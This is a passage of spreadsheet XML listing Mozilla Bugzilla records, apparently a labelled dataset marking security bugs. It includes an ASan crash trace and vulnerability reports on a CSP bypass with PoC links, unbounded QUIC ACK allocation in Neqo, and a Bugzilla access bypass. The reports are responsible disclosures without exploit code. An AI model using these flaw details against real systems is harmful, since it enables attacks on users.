    #22 0x7fc207a3a713 in EvaluateUCScriptForPrincipalsCommon(JSContext*, JSObject*, JSPrincipals*, JSPrincipals*, unsigned short const*, unsigned int, char const*, unsigned int, JS::Value*, JSVersion) firefox/src/js/src/jsapi.cpp:5370
    #23 0x7fc207a3a9d9 in JS_EvaluateUCScriptForPrincipalsVersionOrigin firefox/src/js/src/jsapi.cpp:5407
    #24 0x7fc205f23907 in nsJSContext::EvaluateString(nsAString_internal const&amp;, JSObject*, nsIPrincipal*, nsIPrincipal*, char const*, unsigned int, JSVersion, nsAString_internal*, bool*) firefox/src/dom/base/nsJSEnvironment.cpp:1466
    #25 0x7fc205f7eece in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) firefox/src/dom/base/nsGlobalWindow.cpp:9519
    #26 0x7fc205f6e285 in nsGlobalWindow::RunTimeout(nsTimeout*) firefox/src/dom/base/nsGlobalWindow.cpp:9783
    #27 0x7fc205f7e378 in nsGlobalWindow::TimerCallback(nsITimer*, void*) firefox/src/dom/base/nsGlobalWindow.cpp:10055
    #28 0x7fc2071f9094 in nsTimerImpl::Fire() firefox/src/xpcom/threads/nsTimerImpl.cpp:473
    #29 0x7fc2071f95e6 in nsTimerEvent::Run() firefox/src/xpcom/threads/nsTimerImpl.cpp:559
previously allocated by thread T0 here:
    #0 0x425b02 in __interceptor_malloc ??:0
    #1 0x7fc209fd13f0 in moz_xmalloc firefox/src/memory/mozalloc/mozalloc.cpp:54
    #2 0x7fc205a3f31d in nsContentUtils::SetNodeTextContent(nsIContent*, nsAString_internal const&amp;, bool) firefox/src/content/base/src/nsContentUtils.cpp:4310
    #3 0x7fc20677c151 in nsIDOMNode_SetTextContent(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;long&gt;, int, JS::Value*) firefox/src/objdir-ff-asan/js/xpconnect/src/dom_quickstubs.cpp:5665
    #4 0x7fc207b64928 in js::CallJSPropertyOpSetter(JSContext*, int (*)(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;long&gt;, int, JS::Value*), JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;long&gt;, int, JS::Value*) firefox/src/js/src/jscntxtinlines.h:460
    #5 0x7fc207b695f1 in js::baseops::SetPropertyHelper(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;long&gt;, unsigned int, JS::Value*, int) firefox/src/js/src/jsobj.cpp:4924
    #6 0x7fc207b2d620 in js::SetPropertyOperation(JSContext*, unsigned char*, JS::Value const&amp;, JS::Value const&amp;) firefox/src/js/src/jsinterpinlines.h:353
    #7 0x7fc207b0bbb8 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) firefox/src/js/src/jsinterp.cpp:2378
    #8 0x7fc207b09315 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) firefox/src/js/src/jsinterp.cpp:299
    #9 0x7fc207b29467 in js::ExecuteKernel(JSContext*, JSScript*, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) firefox/src/js/src/jsinterp.cpp:482
    #10 0x7fc207b297f1 in js::Execute(JSContext*, JSScript*, JSObject&amp;, JS::Value*) firefox/src/js/src/jsinterp.cpp:519
    #11 0x7fc207a3a713 in EvaluateUCScriptForPrincipalsCommon(JSContext*, JSObject*, JSPrincipals*, JSPrincipals*, unsigned short const*, unsigned int, char const*, unsigned int, JS::Value*, JSVersion) firefox/src/js/src/jsapi.cpp:5370
    #12 0x7fc207a3a9d9 in JS_EvaluateUCScriptForPrincipalsVersionOrigin firefox/src/js/src/jsapi.cpp:5407
    #13 0x7fc205f23907 in nsJSContext::EvaluateString(nsAString_internal const&amp;, JSObject*, nsIPrincipal*, nsIPrincipal*, char const*, unsigned int, JSVersion, nsAString_internal*, bool*) firefox/src/dom/base/nsJSEnvironment.cpp:1466
    #14 0x7fc205f7eece in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) firefox/src/dom/base/nsGlobalWindow.cpp:9519
    #15 0x7fc205f6e285 in nsGlobalWindow::RunTimeout(nsTimeout*) firefox/src/dom/base/nsGlobalWindow.cpp:9783
    #16 0x7fc205f7e378 in nsGlobalWindow::TimerCallback(nsITimer*, void*) firefox/src/dom/base/nsGlobalWindow.cpp:10055
    #17 0x7fc2071f9094 in nsTimerImpl::Fire() firefox/src/xpcom/threads/nsTimerImpl.cpp:473
    #18 0x7fc2071f95e6 in nsTimerEvent::Run() firefox/src/xpcom/threads/nsTimerImpl.cpp:559
    #19 0x7fc2071ef654 in nsThread::ProcessNextEvent(bool, bool*) firefox/src/xpcom/threads/nsThread.cpp:624
    #20 0x7fc20716061d in NS_ProcessNextEvent_P(nsIThread*, bool) firefox/src/objdir-ff-asan/xpcom/build/nsThreadUtils.cpp:217
    #21 0x7fc206f5fd48 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) firefox/src/ipc/glue/MessagePump.cpp:82
    #22 0x7fc20726091f in MessageLoop::Run() firefox/src/ipc/chromium/src/base/message_loop.cc:176
    #23 0x7fc206d6f73e in nsBaseAppShell::Run() firefox/src/widget/xpwidgets/nsBaseAppShell.cpp:165
    #24 0x7fc205171943 in XREMain::XRE_main(int, char**, nsXREAppData const*) firefox/src/toolkit/xre/nsAppRunner.cpp:3864
==19766== ABORTING
Stats: 254M malloced (344M for red zones) by 1006225 calls
Stats: 61M realloced by 90383 calls
Stats: 199M freed by 740263 calls
Stats: 96M really freed by 201732 calls
Stats: 528M (135231 full pages) mmaped in 132 calls
  mmaps   by size class: 8:704469; 9:81910; 10:24570; 11:20470; 12:5120; 13:4608; 14:1792; 15:512; 16:640; 17:160; 18:208; 19:48; 20:16;
  mallocs by size class: 8:829738; 9:109453; 10:28229; 11:24936; 12:5172; 13:4924; 14:2120; 15:516; 16:683; 17:171; 18:222; 19:45; 20:16;
  frees   by size class: 8:588569; 9:95710; 10:23943; 11:20926; 12:3996; 13:3894; 14:1904; 15:444; 16:595; 17:151; 18:78; 19:40; 20:13;
  rfrees  by size class: 8:144710; 9:31877; 10:10454; 11:10832; 12:1184; 13:698; 14:1154; 15:224; 16:419; 17:82; 18:51; 19:37; 20:10;
Stats: malloc large: 454 small slow: 3904
Shadow byte and word:
  0x1ff839bad137: fd
  0x1ff839bad130: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1ff839bad110: 00 00 00 fb fb fb fb fb
  0x1ff839bad118: fb fb fb fb fb fb fb fb
  0x1ff839bad120: fa fa fa fa fa fa fa fa
  0x1ff839bad128: fa fa fa fa fa fa fa fa
=&gt;0x1ff839bad130: fd fd fd fd fd fd fd fd
  0x1ff839bad138: fd fd fd fd fd fd fd fd
  0x1ff839bad140: fa fa fa fa fa fa fa fa
  0x1ff839bad148: fa fa fa fa fa fa fa fa
  0x1ff839bad150: fd fd fd fd fd fd fd fd</t>
        </is>
      </c>
      <c r="X5645" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5646">
      <c r="A5646" t="n">
        <v>490410</v>
      </c>
      <c r="B5646" t="inlineStr">
        <is>
          <t>2009-04-27 23:13:43 -0700</t>
        </is>
      </c>
      <c r="C5646" t="inlineStr">
        <is>
          <t>Another Crash on testcase from 489647 with accessibility enabled in [@nsTextFrame::ClearTextRun()]</t>
        </is>
      </c>
      <c r="D5646" t="inlineStr">
        <is>
          <t>2009-06-11 14:50:23 -0700</t>
        </is>
      </c>
      <c r="E5646" t="n">
        <v>1</v>
      </c>
      <c r="F5646" t="n">
        <v>1</v>
      </c>
      <c r="G5646" t="n">
        <v>3</v>
      </c>
      <c r="H5646" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5646" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5646" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K5646" t="inlineStr">
        <is>
          <t>1.9.0 Branch</t>
        </is>
      </c>
      <c r="L5646" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5646" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5646" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5646" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5646" t="inlineStr">
        <is>
          <t>[sg:dupe 472776]</t>
        </is>
      </c>
      <c r="Q5646" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5646" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5646" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5646" t="n">
        <v>1</v>
      </c>
      <c r="U5646" t="n">
        <v>0</v>
      </c>
      <c r="V5646" t="n">
        <v>14</v>
      </c>
      <c r="W5646" t="inlineStr">
        <is>
          <t>Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042315
Firefox/3.0.10
Seems, I can still make firefox 3.0.10 crash by enabling accessibility in gnome
on ubuntu jaunty, like:
1.  gconftool-2 --set --type=bool /desktop/gnome/interface/accessibility true
2.  ./firefox https://bugzilla.mozilla.org/attachment.cgi?id=374249
Sample Crash:
http://crash-stats.mozilla.com/report/index/34ac9c9a-9a6d-4ce6-b4e7-7ace62090427</t>
        </is>
      </c>
      <c r="X5646" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5647">
      <c r="A5647" t="n">
        <v>12884</v>
      </c>
      <c r="B5647" t="inlineStr">
        <is>
          <t>1999-08-31 13:38:08 -0700</t>
        </is>
      </c>
      <c r="C5647" t="inlineStr">
        <is>
          <t>Controls don't work with API.xs</t>
        </is>
      </c>
      <c r="D5647" t="inlineStr">
        <is>
          <t>1999-09-08 14:23:37 -0700</t>
        </is>
      </c>
      <c r="E5647" t="n">
        <v>1</v>
      </c>
      <c r="F5647" t="n">
        <v>1</v>
      </c>
      <c r="G5647" t="n">
        <v>3</v>
      </c>
      <c r="H5647" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5647" t="inlineStr">
        <is>
          <t>Directory</t>
        </is>
      </c>
      <c r="J5647" t="inlineStr">
        <is>
          <t>PerLDAP</t>
        </is>
      </c>
      <c r="K5647" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5647" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5647" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5647" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5647" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5647" t="inlineStr"/>
      <c r="Q5647" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5647" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5647" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5647" t="n">
        <v>1</v>
      </c>
      <c r="U5647" t="n">
        <v>0</v>
      </c>
      <c r="V5647" t="n">
        <v>5</v>
      </c>
      <c r="W5647" t="inlineStr">
        <is>
          <t>"Eric C. Hagberg" &lt;hagberg@ms.com&gt; writes:
Are there any examples for PerLDAP using controls, specifically VLV or
persistent searches?
Tried a few things after reading the C SDK and the Mozilla::LDAP::API
docs, but I can't seem to even get a successful result from a
ldap_create_sort_control() or ldap_create_virtuallist_control() call.
They always seem to return a "Bad parameter to an ldap routine" error.
Thanks,
-Eric</t>
        </is>
      </c>
      <c r="X5647" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5648">
      <c r="A5648" t="n">
        <v>1223743</v>
      </c>
      <c r="B5648" t="inlineStr">
        <is>
          <t>2015-11-11 02:58:45 -0800</t>
        </is>
      </c>
      <c r="C5648" t="inlineStr">
        <is>
          <t>CSP is not applied to documents sent through multipart/x-mixed-replace</t>
        </is>
      </c>
      <c r="D5648" t="inlineStr">
        <is>
          <t>2024-05-30 09:06:57 -0700</t>
        </is>
      </c>
      <c r="E5648" t="n">
        <v>1</v>
      </c>
      <c r="F5648" t="n">
        <v>1</v>
      </c>
      <c r="G5648" t="n">
        <v>3</v>
      </c>
      <c r="H5648" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5648" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5648" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K5648" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5648" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5648" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5648" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5648" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5648" t="inlineStr">
        <is>
          <t>[adv-main46+]</t>
        </is>
      </c>
      <c r="Q5648" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5648" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5648" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T5648" t="n">
        <v>1</v>
      </c>
      <c r="U5648" t="n">
        <v>0</v>
      </c>
      <c r="V5648" t="n">
        <v>9</v>
      </c>
      <c r="W5648" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Steps to reproduce:
Open the following PoC.
http://mallory.csrf.jp/x-mixed-replace/csp/bad.php
Actual results:
The response from above URL is multipart/x-mixed-replace and it contains two text/html documents in it. Both documents triggers alert(1); and alert(2) from the inline-script. This URL is protected by CSP with default-src 'self' so the inline-script should be ignored but Firefox doesn't.
Expected results:
CSP should be applied to all documents in a multipart/x-mixed-replace response.
The inline script script execution should be ignored like ordinal HTML document (see following URL).
http://mallory.csrf.jp/x-mixed-replace/csp/good.php</t>
        </is>
      </c>
      <c r="X5648" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5649">
      <c r="A5649" t="n">
        <v>1875701</v>
      </c>
      <c r="B5649" t="inlineStr">
        <is>
          <t>2024-01-21 09:00:24 -0800</t>
        </is>
      </c>
      <c r="C5649" t="inlineStr">
        <is>
          <t>firefox/neqo: unbounded mem alloc based on unsanitized network input</t>
        </is>
      </c>
      <c r="D5649" t="inlineStr">
        <is>
          <t>2024-09-16 00:27:17 -0700</t>
        </is>
      </c>
      <c r="E5649" t="n">
        <v>1</v>
      </c>
      <c r="F5649" t="n">
        <v>1</v>
      </c>
      <c r="G5649" t="n">
        <v>3</v>
      </c>
      <c r="H5649" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5649" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5649" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K5649" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5649" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5649" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5649" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5649" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5649" t="inlineStr">
        <is>
          <t>[Fixed in bug 1877942][reporter-external] [client-bounty-form] [verif?][necko-triaged][adv-main124+]</t>
        </is>
      </c>
      <c r="Q5649" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5649" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5649" t="inlineStr">
        <is>
          <t>124 Branch</t>
        </is>
      </c>
      <c r="T5649" t="n">
        <v>1</v>
      </c>
      <c r="U5649" t="n">
        <v>0</v>
      </c>
      <c r="V5649" t="n">
        <v>14</v>
      </c>
      <c r="W5649" t="inlineStr">
        <is>
          <t>Created attachment 9375675
0001-fix-transport-bound-ACK-range-count-in-ACK-frame.patch
Hi there,
This is Max Inden (https://github.com/mxinden).
I believe I found a security vulnerability affecting Firefox.
### Summary
A malicious remote server can send a tampered QUIC ACK frame, causing a Firefox instance to attempt an effectively unbounded memory allocation and thus OOM.
### Details
When decoding a QUIC ACK frame, Neqo will first read the ACK range count (nr) and then allocate a Vec with a capacity of the count (arr). It does not enforce an upper bound on the count. Thus an attacker can choose an arbitrarily large ACK range count and thus cause Neqo to attempt an effectively infinite memory allocation.
&gt; FRAME_TYPE_ACK | FRAME_TYPE_ACK_ECN =&gt; {
&gt;     let la = dv(dec)?;
&gt;     let ad = dv(dec)?;
&gt;     let nr = dv(dec)?;
&gt;     let fa = dv(dec)?;
&gt;     let mut arr: Vec&lt;AckRange&gt; = Vec::with_capacity(nr as usize);
https://github.com/mozilla/neqo/blob/4de3279b8ac881ef4683a8331fc33c2917019562/neqo-transport/src/frame.rs#L410-L415
### Next steps
I have attached a patch to this email. You can apply the patch onto latest Neqo main brach via:
&gt; git apply 0001-fix-transport-bound-ACK-range-count-in-ACK-frame.patch
I suggest looping in the Neqo maintainers.
- Martin Thomson &lt;mt@lowentropy.net&gt;
- Kershaw &lt;kershaw@mozilla.com&gt;
- Lars Eggert &lt;lars@eggert.org&gt;
I am happy to open a GitHub advisory on the Neqo GitHub repository directly to ease the process.
Hope this is of some help!
Max</t>
        </is>
      </c>
      <c r="X5649" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5650">
      <c r="A5650" t="n">
        <v>1295322</v>
      </c>
      <c r="B5650" t="inlineStr">
        <is>
          <t>2016-08-15 15:00:19 -0700</t>
        </is>
      </c>
      <c r="C5650" t="inlineStr">
        <is>
          <t>In the newest nightly builds, its possible to capture chrome level exceptions at content level.</t>
        </is>
      </c>
      <c r="D5650" t="inlineStr">
        <is>
          <t>2024-05-30 09:20:34 -0700</t>
        </is>
      </c>
      <c r="E5650" t="n">
        <v>1</v>
      </c>
      <c r="F5650" t="n">
        <v>1</v>
      </c>
      <c r="G5650" t="n">
        <v>6</v>
      </c>
      <c r="H5650" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5650" t="inlineStr">
        <is>
          <t>Firefox Graveyard</t>
        </is>
      </c>
      <c r="J5650" t="inlineStr">
        <is>
          <t>RSS Discovery and Preview</t>
        </is>
      </c>
      <c r="K5650" t="inlineStr">
        <is>
          <t>51 Branch</t>
        </is>
      </c>
      <c r="L5650" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5650" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5650" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5650" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5650" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main51+]</t>
        </is>
      </c>
      <c r="Q5650" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5650" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5650" t="inlineStr">
        <is>
          <t>Firefox 51</t>
        </is>
      </c>
      <c r="T5650" t="n">
        <v>1</v>
      </c>
      <c r="U5650" t="n">
        <v>0</v>
      </c>
      <c r="V5650" t="n">
        <v>20</v>
      </c>
      <c r="W5650" t="inlineStr">
        <is>
          <t>Created attachment 8781271
captureChromeException.html
User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
Build ID: 20160728205137
Steps to reproduce:
Used a named window and the open function combined with the feed URI preview code changes to capture a chrome level exception at content level.  I know we do not want this.
Actual results:
A chrome level exception is captured at content level, and in this testcase is logged to the console.
Expected results:
It is my understanding that we do not want chrome level errors or exceptions being dispatched directly to content level.</t>
        </is>
      </c>
      <c r="X5650" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5651">
      <c r="A5651" t="n">
        <v>389106</v>
      </c>
      <c r="B5651" t="inlineStr">
        <is>
          <t>2007-07-21 12:28:10 -0700</t>
        </is>
      </c>
      <c r="C5651" t="inlineStr">
        <is>
          <t>Escape URIs (especially quotes) when passing them to external protocol handlers</t>
        </is>
      </c>
      <c r="D5651" t="inlineStr">
        <is>
          <t>2021-03-08 12:35:42 -0800</t>
        </is>
      </c>
      <c r="E5651" t="n">
        <v>1</v>
      </c>
      <c r="F5651" t="n">
        <v>1</v>
      </c>
      <c r="G5651" t="n">
        <v>3</v>
      </c>
      <c r="H5651" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5651" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5651" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K5651" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5651" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5651" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5651" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5651" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5651" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q5651" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5651" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5651" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5651" t="n">
        <v>1</v>
      </c>
      <c r="U5651" t="n">
        <v>0</v>
      </c>
      <c r="V5651" t="n">
        <v>75</v>
      </c>
      <c r="W5651" t="inlineStr">
        <is>
          <t>different takes on this from different people, biesi has a patch for nsOSHelperAppService.cpp</t>
        </is>
      </c>
      <c r="X5651" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5652">
      <c r="A5652" t="n">
        <v>745397</v>
      </c>
      <c r="B5652" t="inlineStr">
        <is>
          <t>2012-04-13 19:28:12 -0700</t>
        </is>
      </c>
      <c r="C5652" t="inlineStr">
        <is>
          <t>[SECURITY] The JS template for buglists permits attackers to access all bugs that the victim can see</t>
        </is>
      </c>
      <c r="D5652" t="inlineStr">
        <is>
          <t>2024-05-29 16:00:39 -0700</t>
        </is>
      </c>
      <c r="E5652" t="n">
        <v>1</v>
      </c>
      <c r="F5652" t="n">
        <v>1</v>
      </c>
      <c r="G5652" t="n">
        <v>4</v>
      </c>
      <c r="H5652" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5652" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5652" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K5652" t="inlineStr">
        <is>
          <t>2.17.4</t>
        </is>
      </c>
      <c r="L5652" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5652" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5652" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5652" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5652" t="inlineStr"/>
      <c r="Q5652" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5652" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5652" t="inlineStr">
        <is>
          <t>Bugzilla 3.6</t>
        </is>
      </c>
      <c r="T5652" t="n">
        <v>1</v>
      </c>
      <c r="U5652" t="n">
        <v>0</v>
      </c>
      <c r="V5652" t="n">
        <v>21</v>
      </c>
      <c r="W5652" t="inlineStr">
        <is>
          <t>Created attachment 614984
PoC against landfill-tip
Bug 195530 added a JavaScript template for buglists in Bugzilla 2.17.4. Despite it was written with security in mind (see the 2nd patch there), it's still possible to bypass this security check by forcing buglist.cgi to log in the user again after the check is done, see the PoC (no worry, it tries to access bugs on landfill). To make the PoC work, you must first be logged into https://landfill.bugzilla.org/bugzilla-tip/. The vulnerability exists since 2.17.4.
The best way to fix this bug is to remove this JS template. I'm pretty sure that nobody besides gerv and Jesse knows that this template exists (I found it by accident earlier today). Either that, or this code must be moved right before calling Search.pm:
  if ((defined $cgi-&gt;param('ctype')) &amp;&amp; ($cgi-&gt;param('ctype') eq "js")) {
      Bugzilla-&gt;logout_request();
  }</t>
        </is>
      </c>
      <c r="X5652" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5653">
      <c r="A5653" t="n">
        <v>1402992</v>
      </c>
      <c r="B5653" t="inlineStr">
        <is>
          <t>2017-09-25 14:35:55 -0700</t>
        </is>
      </c>
      <c r="C5653" t="inlineStr">
        <is>
          <t>Remove coalesced_to_guid field from jobs table</t>
        </is>
      </c>
      <c r="D5653" t="inlineStr">
        <is>
          <t>2018-12-12 03:23:12 -0800</t>
        </is>
      </c>
      <c r="E5653" t="n">
        <v>1</v>
      </c>
      <c r="F5653" t="n">
        <v>1</v>
      </c>
      <c r="G5653" t="n">
        <v>7</v>
      </c>
      <c r="H5653" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5653" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5653" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K5653" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5653" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5653" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5653" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5653" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5653" t="inlineStr"/>
      <c r="Q5653" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5653" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5653" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5653" t="n">
        <v>1</v>
      </c>
      <c r="U5653" t="n">
        <v>0</v>
      </c>
      <c r="V5653" t="n">
        <v>3</v>
      </c>
      <c r="W5653" t="inlineStr">
        <is>
          <t>The value of this field doesn't show up anywhere in the UI.  It is most likely not being used.  We should perhaps ask in email, and if we get no response it's needed, then remove it.</t>
        </is>
      </c>
      <c r="X5653" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5654">
      <c r="A5654" t="n">
        <v>1355764</v>
      </c>
      <c r="B5654" t="inlineStr">
        <is>
          <t>2017-04-12 03:09:03 -0700</t>
        </is>
      </c>
      <c r="C5654" t="inlineStr">
        <is>
          <t>Replace window drag space above tabs with space at the start of the tab strip</t>
        </is>
      </c>
      <c r="D5654" t="inlineStr">
        <is>
          <t>2020-03-10 06:46:43 -0700</t>
        </is>
      </c>
      <c r="E5654" t="n">
        <v>1</v>
      </c>
      <c r="F5654" t="n">
        <v>1</v>
      </c>
      <c r="G5654" t="n">
        <v>2</v>
      </c>
      <c r="H5654" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5654" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5654" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K5654" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5654" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5654" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5654" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5654" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5654" t="inlineStr">
        <is>
          <t>[photon-visual][p2][57]</t>
        </is>
      </c>
      <c r="Q5654" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5654" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5654" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T5654" t="n">
        <v>1</v>
      </c>
      <c r="U5654" t="n">
        <v>0</v>
      </c>
      <c r="V5654" t="n">
        <v>21</v>
      </c>
      <c r="W5654" t="inlineStr">
        <is>
          <t>See https://people-mozilla.org/~shorlander/projects/photon/Mockups/windows-10.html</t>
        </is>
      </c>
      <c r="X5654" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5655">
      <c r="A5655" t="n">
        <v>1178890</v>
      </c>
      <c r="B5655" t="inlineStr">
        <is>
          <t>2015-06-30 11:21:50 -0700</t>
        </is>
      </c>
      <c r="C5655" t="inlineStr">
        <is>
          <t>TimerThread::DoAfterSleep() seems to not be threadsafe</t>
        </is>
      </c>
      <c r="D5655" t="inlineStr">
        <is>
          <t>2016-07-02 10:53:57 -0700</t>
        </is>
      </c>
      <c r="E5655" t="n">
        <v>1</v>
      </c>
      <c r="F5655" t="n">
        <v>1</v>
      </c>
      <c r="G5655" t="n">
        <v>3</v>
      </c>
      <c r="H5655" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
